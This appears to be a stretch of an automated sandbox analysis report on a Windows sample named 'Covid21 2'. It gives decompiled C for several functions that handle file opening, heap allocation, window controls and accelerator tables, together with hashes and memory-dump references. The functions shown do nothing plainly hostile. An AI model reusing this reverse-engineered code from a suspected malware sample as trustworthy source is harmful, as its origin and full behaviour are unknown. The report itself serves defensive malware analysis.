                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: LongWindow$MessagePropSend
                                  • String ID: PB_ID
                                  • API String ID: 499798845-4173770792
                                  • Opcode ID: 40e9597ea4ba8294d3e4968612d768a12a22f2b24764c9d991eb6ad8814dbeb4
                                  • Instruction ID: d0f6b8676c2a3c83e12209fd00d02ec4e2cc3fdc8a34abd3e45ab61e197bb196
                                  • Opcode Fuzzy Hash: 40e9597ea4ba8294d3e4968612d768a12a22f2b24764c9d991eb6ad8814dbeb4
                                  • Instruction Fuzzy Hash: FF0180B5500308BFCB109F55DD84D8A7BB8FB44760F208626F925672D1C374D950CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406060, Relevance: 7.6, APIs: 5, Instructions: 100filememoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406060(long __eax, CHAR* __ebx, void* __eflags, intOrPtr _a4) {
				void* _v4;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				long _t26;
				void* _t27;

				_t23 =  *0x40b484; // 0x27d05a8
				_t26 = __eax;
				_t25 = E0040662C(_t23, _a4);
				if(_t26 != 1) {
					if(_t26 != 2) {
						if(_t26 != 3) {
							_t27 = _v4;
							goto L8;
						} else {
							_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 2, 0x80, 0);
							if(_t27 != 0xffffffff) {
								goto L9;
							} else {
								_t27 = CreateFileA(__ebx, 0x40000000, 1, 0, 5, 0, 0);
								goto L8;
							}
						}
					} else {
						_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 4, 0x80, 0);
						goto L8;
					}
				} else {
					_t27 = CreateFileA(__ebx, 0x80000000, _t26, 0, 3, 0x80, 0);
					L8:
					if(_t27 == 0xffffffff) {
						L13:
						if(_a4 == 0xffffffff) {
							_t13 =  *0x40b484; // 0x27d05a8
							E004066BB(_t13, _t25);
						}
						return 0;
					} else {
						L9:
						if(_t27 == 0) {
							goto L13;
						} else {
							 *_t25 = _t27;
							_t24 =  *0x40b13c; // 0x27d0000
							 *((intOrPtr*)(_t25 + 4)) = RtlAllocateHeap(_t24, 0, 0x1000);
							 *(_t25 + 8) = 0x1000;
							 *(_t25 + 0xc) = 0;
							 *(_t25 + 0x14) = 1;
							if(_v4 != 0xffffffff) {
								return _t27;
							} else {
								return _t25;
							}
						}
					}
				}
			}










                                  0x00406061
                                  0x0040606a
                                  0x0040607a
                                  0x0040607c
                                  0x0040609d
                                  0x004060bf
                                  0x004060f9
                                  0x00000000
                                  0x004060c1
                                  0x004060dc
                                  0x004060e1
                                  0x00000000
                                  0x004060e3
                                  0x004060f5
                                  0x00000000
                                  0x004060f5
                                  0x004060e1
                                  0x0040609f
                                  0x004060b8
                                  0x00000000
                                  0x004060b8
                                  0x0040607e
                                  0x00406096
                                  0x004060fd
                                  0x00406100
                                  0x00406149
                                  0x0040614e
                                  0x00406150
                                  0x00406157
                                  0x00406157
                                  0x00406162
                                  0x00406102
                                  0x00406102
                                  0x00406104
                                  0x00000000
                                  0x00406106
                                  0x0040610b
                                  0x0040610d
                                  0x00406121
                                  0x00406124
                                  0x0040612b
                                  0x00406132
                                  0x00406139
                                  0x00406148
                                  0x0040613b
                                  0x00406141
                                  0x00406141
                                  0x00406139
                                  0x00406104
                                  0x00406100

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,027D05A8,?,?,?,027D12D0,?,00406244,00000001,00000001), ref: 00406090
                                  • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,027D05A8,?,?,?,027D12D0,?,00406244,00000001,00000001), ref: 004060B2
                                  • RtlAllocateHeap.NTDLL(027D0000,00000000,00001000), ref: 00406116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CreateFile$AllocateHeap
                                  • String ID:
                                  • API String ID: 2813278966-0
                                  • Opcode ID: d5ac88bd3ffc28555abfcd2760e7205fba9400b2e16f2a0410e4f88c6c94f8a9
                                  • Instruction ID: 01b71ff79a8bf0c406e829018b558c6d2fff1d90de16ee11da95a5ed4ef269dc
                                  • Opcode Fuzzy Hash: d5ac88bd3ffc28555abfcd2760e7205fba9400b2e16f2a0410e4f88c6c94f8a9
                                  • Instruction Fuzzy Hash: 2521E77278031176E6309B28AD06F57B3589744B71F22873AFB62BB2C1C6B5AC60479D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040416A, Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040416A(intOrPtr _a4, intOrPtr _a12, struct HDC__* _a16) {
				long _t9;
				long _t10;
				struct HDC__* _t17;
				intOrPtr _t23;
				struct HBRUSH__* _t25;

				_t25 = 0xd0d0d0d1;
				if(_a12 == 0x138) {
					_t17 = _a16;
					_t23 = _a4;
					_t9 =  *(_t23 + 0x14);
					if(_t9 != 0xffffffff) {
						SetTextColor(_t17, _t9);
						if( *(_t23 + 0x10) == 0xffffffff) {
							SetBkColor(_t17, GetSysColor(0xf));
							_t25 = GetSysColorBrush(0xf);
						}
					}
					_t10 =  *(_t23 + 0x10);
					if(_t10 != 0xffffffff) {
						SetBkColor(_t17, _t10);
						_t25 =  *((intOrPtr*)(_t23 + 0x18));
					}
				}
				return _t25;
			}








                                  0x00404173
                                  0x00404178
                                  0x0040417b
                                  0x00404180
                                  0x00404184
                                  0x00404191
                                  0x00404195
                                  0x0040419f
                                  0x004041ab
                                  0x004041b5
                                  0x004041b5
                                  0x0040419f
                                  0x004041b7
                                  0x004041bd
                                  0x004041c1
                                  0x004041c3
                                  0x004041c3
                                  0x004041c8
                                  0x004041cc

                                  APIs
                                  • SetTextColor.GDI32(?,?), ref: 00404195
                                  • GetSysColor.USER32(0000000F), ref: 004041A3
                                  • SetBkColor.GDI32(?,00000000), ref: 004041AB
                                  • GetSysColorBrush.USER32(0000000F), ref: 004041AF
                                  • SetBkColor.GDI32(?,?), ref: 004041C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Color$BrushText
                                  • String ID:
                                  • API String ID: 3324192670-0
                                  • Opcode ID: 6172721f2218073eb60c4652dad57f6f5c5b2bdd0d3b9622d53c644380a3572e
                                  • Instruction ID: 457ded62e3f9d5314adae7d240338f31a7adc438ae7f8fffd0e9670b0be44b42
                                  • Opcode Fuzzy Hash: 6172721f2218073eb60c4652dad57f6f5c5b2bdd0d3b9622d53c644380a3572e
                                  • Instruction Fuzzy Hash: ACF044B5100304ABD220AB299C48D67B3ECEBA4331F104B36F675E32D1C774EC558A65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004043AE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004043AE(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
				long _t23;
				signed int _t27;
				struct HWND__* _t29;
				struct HWND__** _t31;
				void* _t32;

				_t31 = E0040642D( *0x40b470);
				if( *0x40b354 == 0) {
					memset(0x40b2c0, 0, 0x94);
					 *0x40b2c0 = 2;
					 *0x40b2c4 = 0x94;
					 *0x40b2c8 = 0x4042dd;
					 *0x40b338 = E00404680;
					 *0x40b33c = E004046DA;
					 *0x40b2cc = E00404700;
					 *0x40b354 = 1;
				}
				if(_a24 == 0) {
					_a24 = 0x409000;
				}
				_t27 = _a28;
				_t28 = _t27 | 0x50030080;
				_t29 = CreateWindowExA( !(_t27 >> 8) & 0x00000200, "Edit", _a24, _t27 | 0x50030080, _a8, _a12, _a16, _a20,  *_t31, 0xffffffff,  *0x40b140, 0);
				if(_t29 != 0) {
					_t32 = E0040662C( *0x40b46c, _a4);
					_t23 = SetWindowLongA(_t29, 0xfffffffc, E00404358);
					 *(_t32 + 0x14) =  *(_t32 + 0x14) | 0xffffffff;
					 *(_t32 + 0x10) =  *(_t32 + 0x10) | 0xffffffff;
					 *0x40b2b8 = _t23;
					_t29 = E004047BB(_t28, _a4, _t32, _t29, 0x40b2c0);
				}
				return _t29;
			}








                                  0x004043c6
                                  0x004043cd
                                  0x004043d8
                                  0x004043e0
                                  0x004043ea
                                  0x004043f0
                                  0x004043fa
                                  0x00404404
                                  0x0040440e
                                  0x00404418
                                  0x00404418
                                  0x00404426
                                  0x00404428
                                  0x00404428
                                  0x0040442f
                                  0x00404440
                                  0x0040446c
                                  0x00404470
                                  0x00404488
                                  0x0040448a
                                  0x00404490
                                  0x00404494
                                  0x0040449e
                                  0x004044a8
                                  0x004044a8
                                  0x004044b0

                                  APIs
                                  • memset.MSVCRT ref: 004043D8
                                  • CreateWindowExA.USER32(?,Edit,00000000,?,00000000,?,?,00000000,00000000,000000FF,00000000), ref: 00404466
                                  • SetWindowLongA.USER32(00000000,000000FC,00404358), ref: 0040448A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$CreateLongmemset
                                  • String ID: Edit
                                  • API String ID: 2917088559-554135844
                                  • Opcode ID: bec187a942d1b656482ed2905f925c0f6a25d2fe3050e444c708e093468e8e0b
                                  • Instruction ID: e5c386e0b925eee2f29b2e51a672b597ac0c5d848ebaae7b82fd60e27dbe053f
                                  • Opcode Fuzzy Hash: bec187a942d1b656482ed2905f925c0f6a25d2fe3050e444c708e093468e8e0b
                                  • Instruction Fuzzy Hash: 3C217CB5500309AFDB115F11ED09B5B3EA5FB80325F20823EFA64B62E1C77988248B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403A79, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403A79(void* __eflags, intOrPtr _a4) {
				void* _t8;
				long _t16;
				void* _t17;

				_t17 = E00407750(0x104, _a4);
				_t16 = GetModuleFileNameA( *0x40b140, _t17, 0x104);
				if(strcmp(_t17, "\\\\?\\") == 0) {
					_t2 = _t16 - 4; // -4
					_t3 = _t17 + 4; // 0x4
					memmove(_t17, _t3, _t2);
					_t16 = _t16 - 4;
				}
				_t8 = E004077F0(0x104 - _t16);
				 *((char*)(_t16 + _t17)) = 0;
				return _t8;
			}






                                  0x00403a8c
                                  0x00403aa1
                                  0x00403aac
                                  0x00403aae
                                  0x00403ab2
                                  0x00403ab7
                                  0x00403abf
                                  0x00403abf
                                  0x00403ac5
                                  0x00403aca
                                  0x00403ad1

                                  APIs
                                    • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(029A0000,00000001,029A06F0,000040FF), ref: 00407797
                                  • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,?,?,00000000,00401B68,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000), ref: 00403A95
                                  • strcmp.MSVCRT ref: 00403AA3
                                  • memmove.MSVCRT ref: 00403AB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AllocateFileHeapModuleNamememmovestrcmp
                                  • String ID: \\?\
                                  • API String ID: 1538048364-4282027825
                                  • Opcode ID: 8580f6328cc7ec2d5d33cb1a7ae069f9759180d36672370475e6f019db469a99
                                  • Instruction ID: eca9fff87242976c9b07fb941aabbd565294bd6051fa6d81b78090b42e967216
                                  • Opcode Fuzzy Hash: 8580f6328cc7ec2d5d33cb1a7ae069f9759180d36672370475e6f019db469a99
                                  • Instruction Fuzzy Hash: E1F0A7B36053006AD2116A769D89E9B6B9DDF94365F100437F605E2182E738A91483F9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404E09, Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404E09(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8, short _a12) {
				signed int _v8;
				signed int _t54;
				signed int _t55;
				struct tagACCEL* _t57;
				struct HACCEL__* _t64;
				int _t69;
				struct tagACCEL* _t82;
				void* _t84;

				_v8 = 3;
				_t84 = E00406690( *0x40b474, _a4);
				if(_t84 != 0) {
					if((_a8 & 0x00010000) != 0) {
						_v8 = 7;
					}
					if((_a8 & 0x00020000) != 0) {
						_v8 = _v8 | 0x00000008;
					}
					if((_a8 & 0x00040000) != 0) {
						_v8 = _v8 | 0x00000010;
					}
					_t69 =  *(_t84 + 0x10);
					_a8 = _a8 & 0x0000ffff;
					_t54 = 0;
					if(_t69 <= 0) {
						L12:
						_t55 = _t69 + 1;
						 *(_t84 + 0x10) = _t55;
						if(_t55 != 1) {
							_t57 = RtlReAllocateHeap( *0x40b13c, 0,  *(_t84 + 4), _t55 * 6);
						} else {
							_t57 = RtlAllocateHeap( *0x40b13c, 0, 6);
						}
						 *(_t84 + 4) = _t57;
						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 4)) = _a8;
						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 2)) = _a12;
						 *((char*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 6)) = _v8;
					} else {
						_t82 =  *(_t84 + 4);
						while(_a8 != (_t82->key & 0x0000ffff) || _v8 != ( *_t82 & 0x000000ff)) {
							_t54 = _t54 + 1;
							_t82 = _t82 + 6;
							if(_t54 < _t69) {
								continue;
							} else {
								goto L12;
							}
							goto L17;
						}
						 *((short*)( &( *(_t84 + 4)->cmd) + _t54 * 6)) = _a12;
					}
					L17:
					_t64 =  *(_t84 + 8);
					if(_t64 != 0) {
						DestroyAcceleratorTable(_t64);
					}
					 *(_t84 + 8) = CreateAcceleratorTableA( *(_t84 + 4),  *(_t84 + 0x10));
				}
				return  *(_t84 + 8);
			}











                                  0x00404e11
                                  0x00404e23
                                  0x00404e27
                                  0x00404e34
                                  0x00404e36
                                  0x00404e36
                                  0x00404e44
                                  0x00404e46
                                  0x00404e46
                                  0x00404e51
                                  0x00404e53
                                  0x00404e53
                                  0x00404e57
                                  0x00404e5a
                                  0x00404e61
                                  0x00404e66
                                  0x00404e84
                                  0x00404e84
                                  0x00404e8a
                                  0x00404e8d
                                  0x00404ec1
                                  0x00404e8f
                                  0x00404e99
                                  0x00404e99
                                  0x00404ecb
                                  0x00404ed7
                                  0x00404ee9
                                  0x00404efa
                                  0x00404e68
                                  0x00404e68
                                  0x00404e6b
                                  0x00404e7c
                                  0x00404e7d
                                  0x00404e82
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404e82
                                  0x00404eab
                                  0x00404eab
                                  0x00404efe
                                  0x00404efe
                                  0x00404f04
                                  0x00404f07
                                  0x00404f07
                                  0x00404f19
                                  0x00404f19
                                  0x00404f21

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,00000006), ref: 00404E99
                                  • DestroyAcceleratorTable.USER32(?), ref: 00404F07
                                  • CreateAcceleratorTableA.USER32(?,?,00000000,?,?,?,004015C2,00000000,0000000D,00000004,00000003,0000003D,0000004B,0000004E,00000014,0040A28D), ref: 00404F13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AcceleratorTable$AllocateCreateDestroyHeap
                                  • String ID:
                                  • API String ID: 1846328917-0
                                  • Opcode ID: 0852f3e38e9601b8ea9a1c73be7650b94146103b832f7dc3de22f405e3a5ff1b
                                  • Instruction ID: a9d74fe08e35607087e68633b6b3ac79de1f82750c2c3d7b4edd57319feaf6d7
                                  • Opcode Fuzzy Hash: 0852f3e38e9601b8ea9a1c73be7650b94146103b832f7dc3de22f405e3a5ff1b
                                  • Instruction Fuzzy Hash: EC317070500702DBC725CF24CA45A6ABBF5FF94714F10C83DE956AB6A0E375EA50DB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405C1A, Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405C1A(struct HWND__* _a4, intOrPtr* _a8) {
				struct HWND__* _t12;
				struct HWND__* _t14;
				intOrPtr* _t18;

				_t14 = _a4;
				_t16 = 1;
				if(IsWindowEnabled(_t14) != 0 && IsWindowVisible(_t14) != 0 && (GetWindowLongA(_t14, 0xfffffff0) & 0x00010000) != 0) {
					_t18 = _a8;
					if( *_t18 == _t14) {
						_t12 =  *(_t18 + 4);
						if(_t12 != 0) {
							SetFocus(_t12);
							 *((intOrPtr*)(_t18 + 0xc)) = 1;
							_t16 = 0;
						}
					}
					 *(_t18 + 4) = _t14;
				}
				return _t16;
			}






                                  0x00405c1b
                                  0x00405c23
                                  0x00405c2c
                                  0x00405c4a
                                  0x00405c50
                                  0x00405c52
                                  0x00405c57
                                  0x00405c5a
                                  0x00405c60
                                  0x00405c63
                                  0x00405c63
                                  0x00405c57
                                  0x00405c65
                                  0x00405c68
                                  0x00405c6d

                                  APIs
                                  • IsWindowEnabled.USER32(?), ref: 00405C24
                                  • IsWindowVisible.USER32(?), ref: 00405C2F
                                  • GetWindowLongA.USER32(?,000000F0), ref: 00405C3C
                                  • SetFocus.USER32(?), ref: 00405C5A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$EnabledFocusLongVisible
                                  • String ID:
                                  • API String ID: 599048109-0
                                  • Opcode ID: d6914770e2e1d8594dbfc7a4944e97bb1c076ccadc3317546e9f57e33cdf2bab
                                  • Instruction ID: e46cec46e1855522641c6138c738b3172ba88ca019945debca18c59b96db7e29
                                  • Opcode Fuzzy Hash: d6914770e2e1d8594dbfc7a4944e97bb1c076ccadc3317546e9f57e33cdf2bab
                                  • Instruction Fuzzy Hash: F0F0DA752047019BE7215F36DE8CA57B7ACEB94751718843EB896E3290CA38D850CA6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004051A3, Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004051A3(struct HWND__* _a4, struct tagPOINT _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {

				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0) {
					MapWindowPoints(0, GetParent(_a4),  &_a8, 2);
				}
				return MoveWindow(_a4, _a8.x, _a12, _a16 - _a8, _a20 - _a12, 1);
			}



                                  0x004051b6
                                  0x004051ca
                                  0x004051ca
                                  0x004051f0

                                  APIs
                                  • GetWindowLongA.USER32(?,000000F0), ref: 004051AB
                                  • GetParent.USER32(?), ref: 004051C1
                                  • MapWindowPoints.USER32(00000000,00000000), ref: 004051CA
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004051E9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$LongMoveParentPoints
                                  • String ID:
                                  • API String ID: 473562985-0
                                  • Opcode ID: fca909fb8084ca993e23cb08f133c50a6035ac502da8b0c7087f63ad4b74f454
                                  • Instruction ID: a18a99c305bfb6e287be399bcb2239b6defd201362481c224b9852c7cddba058
                                  • Opcode Fuzzy Hash: fca909fb8084ca993e23cb08f133c50a6035ac502da8b0c7087f63ad4b74f454
                                  • Instruction Fuzzy Hash: CCF0F832100209BFDF019F98DD49FAA3BB9FB08310F008120FE19AA1A0C731D961DB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004041CF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004041CF(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
				void* _t21;
				struct HWND__** _t24;
				signed int _t25;
				struct HWND__* _t28;

				_t24 = E0040642D( *0x40b470);
				if( *0x40b2b4 == 0) {
					memset(0x40b220, 0, 0x94);
					 *0x40b220 = 3;
					 *0x40b224 = 0x94;
					 *0x40b228 = E0040416A;
					 *0x40b298 = E00404680;
					 *0x40b29c = E004046DA;
					 *0x40b22c = E00404700;
					 *0x40b2b4 = 1;
				}
				if(_a24 == 0) {
					_a24 = 0x409000;
				}
				_t25 = _a28;
				_t26 = _t25 | 0x50020000;
				_t28 = CreateWindowExA(_t25 >> 0x00000008 & 0x00000200, "Static", _a24, _t25 | 0x50020000, _a8, _a12, _a16, _a20,  *_t24, 0xffffffff,  *0x40b140, 0);
				if(_t28 != 0) {
					_t21 = E0040662C( *0x40b46c, _a4);
					 *(_t21 + 0x14) =  *(_t21 + 0x14) | 0xffffffff;
					 *(_t21 + 0x10) =  *(_t21 + 0x10) | 0xffffffff;
					_t28 = E004047BB(_t26, _a4, _t21, _t28, 0x40b220);
				}
				return _t28;
			}







                                  0x004041e7
                                  0x004041ee
                                  0x004041f9
                                  0x00404201
                                  0x0040420b
                                  0x00404211
                                  0x0040421b
                                  0x00404225
                                  0x0040422f
                                  0x00404239
                                  0x00404239
                                  0x00404247
                                  0x00404249
                                  0x00404249
                                  0x00404250
                                  0x00404261
                                  0x0040428b
                                  0x0040428f
                                  0x0040429a
                                  0x0040429f
                                  0x004042a3
                                  0x004042b2
                                  0x004042b2
                                  0x004042ba

                                  APIs
                                  • memset.MSVCRT ref: 004041F9
                                  • CreateWindowExA.USER32(?,Static,00000000,?,00000000,?,?,00000000,00000000,000000FF,00000000), ref: 00404285
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CreateWindowmemset
                                  • String ID: Static
                                  • API String ID: 1730425660-2272013587
                                  • Opcode ID: c15f6615e80c30286dc08ed3e9deb35d650bd70a7ff60488baf798fb75923203
                                  • Instruction ID: 84a37009a15c89f1d04e7a9e1e9a7395bcedb45b6e7d81063e5dd9e94b969813
                                  • Opcode Fuzzy Hash: c15f6615e80c30286dc08ed3e9deb35d650bd70a7ff60488baf798fb75923203
                                  • Instruction Fuzzy Hash: B0218BB1501209AFDB115F51ED09F5B3EA4EB85364F00427EFA24BA2E1C37A8920CBDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004044F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E004044F0(void* __ecx, intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
				struct HWND__** _v8;
				struct HWND__** _t13;
				struct HWND__* _t32;
				intOrPtr _t37;

				_t27 = __ecx;
				_push(__ecx);
				_t13 = E0040642D( *0x40b470);
				_t37 =  *0x40b3ec; // 0x0
				_v8 = _t13;
				if(_t37 == 0) {
					memset(0x40b358, 0, 0x94);
					 *0x40b358 = 1;
					 *0x40b35c = 0x94;
					 *0x40b368 = E004044D5;
					 *0x40b36c = E004044B3;
					 *0x40b3ec = 1;
				}
				if(_a24 == 0) {
					_a24 = 0x409000;
				}
				_t32 = CreateWindowExA(0, "Button", _a24, _a28 | 0x50030000, _a8, _a12, _a16, _a20,  *_v8, 0xffffffff,  *0x40b140, 0);
				if(_t32 != 0) {
					_t32 = E004047BB(_t27, _a4, E0040662C( *0x40b46c, _a4), _t32, 0x40b358);
				}
				return _t32;
			}







                                  0x004044f0
                                  0x004044f3
                                  0x004044fd
                                  0x00404504
                                  0x0040450a
                                  0x00404512
                                  0x0040451c
                                  0x00404527
                                  0x0040452c
                                  0x00404532
                                  0x0040453c
                                  0x00404546
                                  0x00404546
                                  0x0040454e
                                  0x00404550
                                  0x00404550
                                  0x00404589
                                  0x0040458d
                                  0x004045a8
                                  0x004045a8
                                  0x004045b0

                                  APIs
                                  • memset.MSVCRT ref: 0040451C
                                  • CreateWindowExA.USER32(00000000,Button,?,?,00000000,?,?,00000000,00000000,000000FF,00000000), ref: 00404583
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
